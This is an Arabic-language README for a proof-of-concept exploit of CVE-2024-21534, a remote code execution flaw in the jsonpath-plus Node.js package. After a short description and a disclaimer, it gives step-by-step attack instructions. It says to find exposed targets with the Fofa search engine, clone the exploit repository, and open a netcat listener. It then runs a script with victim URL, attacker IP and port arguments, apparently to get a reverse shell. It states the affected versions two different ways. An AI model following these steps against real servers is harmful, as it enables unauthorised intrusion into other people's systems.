
POC - CVE-2024-21534 Jsonpath-plus عرضة لتنفيذ التعليمات البرمجية عن بُعد (RCE) بسبب عدم تطهير المدخلات بشكل صحيح
تُعد CVE-2024-21534 ثغرة أمنية حرجة وُجدت في إصدارات حزمة jsonpath-plus قبل الإصدار 10.0.0. تنبع الثغرة من عدم كفاية تنظيف المدخلات، مما قد يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) على الأنظمة المتأثرة. هذه الثغرة خطيرة بشكل خاص لأنه يمكن استغلالها دون مصادقة، مما يسمح للمهاجمين بتنفيذ تعليمات برمجية عشوائية على الخادم عن طريق إرسال مدخلات مصممة خصيصًا. تنشأ هذه المشكلة من الاستخدام الافتراضي غير الآمن لوحدة vm في Node.js، والتي قد تؤدي إذا تم استغلالها إلى اختراق النظام بأكمله.
إصدارات jsonpath-plus قبل 10.2.0
تقع الثغرة في حزمة jsonpath-plus، والتي تُستخدم على نطاق واسع للاستعلام عن هياكل بيانات JSON في التطبيقات. يرجع الخلل إلى عدم كفاية تنظيف المدخلات، مما يسمح بتنفيذ تعليمات برمجية خبيثة.
اقرأ عنها — CVE-2024-21534
إخلاء مسؤولية: تم إنشاء هذا الدليل (إثبات المفهوم POC) لأغراض تعليمية واختبار أخلاقي فقط. استخدام هذه الأداة لمهاجمة أهداف دون موافقة متبادلة مسبقة يعد غير قانوني. وتقع على عاتق المستخدم النهائي مسؤولية الامتثال لجميع القوانين المحلية والولائية والفيدرالية المعمول بها. لا يتحمل المطورون أي مسؤولية ولا يكونون مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
للعثور على أهداف محتملة، استخدم Fofa (مشابه لـ Shodan.io):
Jsonpath-plus
أولاً، قم باستنساخ المستودع:
git clone https://github.com/verylazytech/CVE-2024-21534
الآن افتح مستمعًا باستخدام nc:
nc -lnvp 443
شغّل الاستغلال:
تأكد من أن عنوان URL يشير إلى نقطة نهاية تعالج مدخلات المستخدم عبر حزمة jsonpath-plus المعرضة للثغرة، حيث سيسمح ذلك باستغلال ثغرة RCE.
bash ./cve-2024-21534.sh <VICTIM_URL> <ATTACKER_IP> <ATTACKER_PORT>

